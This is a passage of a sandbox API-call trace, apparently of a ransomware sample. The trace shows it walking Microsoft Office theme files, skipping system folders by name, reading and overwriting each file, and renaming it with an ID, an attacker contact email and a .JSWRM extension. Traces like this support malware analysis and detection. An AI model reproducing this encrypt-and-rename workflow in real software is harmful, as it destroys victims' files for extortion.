(HeapHandle=0x1e0000, Flags=0x0, Size=0xb0a0) returned 0x24d210 [0100.841] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb0a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb0a0, lpOverlapped=0x0) returned 1 [0100.894] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.894] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb0a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb0a0, lpOverlapped=0x0) returned 1 [0100.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.894] CloseHandle (hObject=0x314) returned 1 [0100.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0100.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0100.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0100.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dff8 [0100.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0100.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dff8 | out: hHeap=0x1e0000) returned 1 [0100.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.895] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Office 2007 - 2010.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\office 2007 - 2010.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Office 2007 - 2010.eftx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\office 2007 - 2010.eftx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0100.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0100.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0100.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0100.896] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11436ace, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11436ace, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1145cd4f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbcee, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Reflection.eftx", cAlternateFileName="REFLEC~1.EFT")) returned 1 [0100.896] lstrcmpiW (lpString1="Reflection.eftx", lpString2=".") returned 1 [0100.896] lstrcmpiW (lpString1="Reflection.eftx", lpString2="..") returned 1 [0100.897] lstrcmpiW (lpString1="Reflection.eftx", lpString2="...") returned 1 [0100.897] lstrcmpiW (lpString1="Reflection.eftx", lpString2="windows") returned -1 [0100.897] lstrcmpiW (lpString1="Reflection.eftx", lpString2="recovery") returned 1 [0100.897] lstrcmpiW (lpString1="Reflection.eftx", lpString2="perflogs") returned 1 [0100.897] lstrcmpiW (lpString1="Reflection.eftx", lpString2="documents and settings") returned 1 [0100.897] lstrcmpiW (lpString1="Reflection.eftx", lpString2="$RECYCLE.BIN") returned 1 [0100.897] lstrcmpiW (lpString1="Reflection.eftx", lpString2="system volume information") returned -1 [0100.897] lstrcmpiW (lpString1="Reflection.eftx", lpString2="msocache") returned 1 [0100.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0100.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflection.eftx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflection.eftx", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reflection.eftx", lpUsedDefaultChar=0x0) returned 15 [0100.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0100.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflection.eftx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflection.eftx", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reflection.eftx", lpUsedDefaultChar=0x0) returned 15 [0100.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0100.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0100.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0100.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Reflection.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\reflection.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.898] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=48366) returned 1 [0100.899] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbce0) returned 0x24d210 [0100.899] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xbce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xbce0, lpOverlapped=0x0) returned 1 [0100.903] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.903] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xbce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xbce0, lpOverlapped=0x0) returned 1 [0100.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.903] CloseHandle (hObject=0x314) returned 1 [0100.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0100.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0100.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0100.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0100.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0100.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0100.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.904] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Reflection.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\reflection.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Reflection.eftx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\reflection.eftx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0100.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0100.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0100.905] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114108ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114108ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11436ace, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x480a2, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Riblet.eftx", cAlternateFileName="RIBLET~1.EFT")) returned 1 [0100.905] lstrcmpiW (lpString1="Riblet.eftx", lpString2=".") returned 1 [0100.905] lstrcmpiW (lpString1="Riblet.eftx", lpString2="..") returned 1 [0100.905] lstrcmpiW (lpString1="Riblet.eftx", lpString2="...") returned 1 [0100.905] lstrcmpiW (lpString1="Riblet.eftx", lpString2="windows") returned -1 [0100.905] lstrcmpiW (lpString1="Riblet.eftx", lpString2="recovery") returned 1 [0100.905] lstrcmpiW (lpString1="Riblet.eftx", lpString2="perflogs") returned 1 [0100.905] lstrcmpiW (lpString1="Riblet.eftx", lpString2="documents and settings") returned 1 [0100.905] lstrcmpiW (lpString1="Riblet.eftx", lpString2="$RECYCLE.BIN") returned 1 [0100.905] lstrcmpiW (lpString1="Riblet.eftx", lpString2="system volume information") returned -1 [0100.905] lstrcmpiW (lpString1="Riblet.eftx", lpString2="msocache") returned 1 [0100.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0100.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Riblet.eftx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Riblet.eftx", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Riblet.eftx", lpUsedDefaultChar=0x0) returned 11 [0100.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0100.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0100.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Riblet.eftx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Riblet.eftx", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Riblet.eftx", lpUsedDefaultChar=0x0) returned 11 [0100.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0100.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0100.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0100.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0100.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Riblet.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\riblet.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.906] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=295074) returned 1 [0100.906] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0100.906] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0100.919] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.919] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0100.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.919] CloseHandle (hObject=0x314) returned 1 [0100.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0100.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0100.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0100.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0100.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0100.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0100.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.920] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Riblet.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\riblet.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Riblet.eftx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\riblet.eftx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0100.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0100.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0100.921] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11482f7f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d753, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Smokey Glass.eftx", cAlternateFileName="SMOKEY~1.EFT")) returned 1 [0100.921] lstrcmpiW (lpString1="Smokey Glass.eftx", lpString2=".") returned 1 [0100.921] lstrcmpiW (lpString1="Smokey Glass.eftx", lpString2="..") returned 1 [0100.921] lstrcmpiW (lpString1="Smokey Glass.eftx", lpString2="...") returned 1 [0100.921] lstrcmpiW (lpString1="Smokey Glass.eftx", lpString2="windows") returned -1 [0100.921] lstrcmpiW (lpString1="Smokey Glass.eftx", lpString2="recovery") returned 1 [0100.921] lstrcmpiW (lpString1="Smokey Glass.eftx", lpString2="perflogs") returned 1 [0100.921] lstrcmpiW (lpString1="Smokey Glass.eftx", lpString2="documents and settings") returned 1 [0100.921] lstrcmpiW (lpString1="Smokey Glass.eftx", lpString2="$RECYCLE.BIN") returned 1 [0100.921] lstrcmpiW (lpString1="Smokey Glass.eftx", lpString2="system volume information") returned -1 [0100.921] lstrcmpiW (lpString1="Smokey Glass.eftx", lpString2="msocache") returned 1 [0100.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Smokey Glass.eftx", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0100.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Smokey Glass.eftx", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Smokey Glass.eftx", lpUsedDefaultChar=0x0) returned 17 [0100.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Smokey Glass.eftx", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0100.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Smokey Glass.eftx", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Smokey Glass.eftx", lpUsedDefaultChar=0x0) returned 17 [0100.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0100.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0100.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0100.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Smokey Glass.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\smokey glass.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.922] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=186195) returned 1 [0100.922] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0100.922] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0100.933] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.933] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0100.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.933] CloseHandle (hObject=0x314) returned 1 [0100.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0100.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.934] RtlAllocateHeap 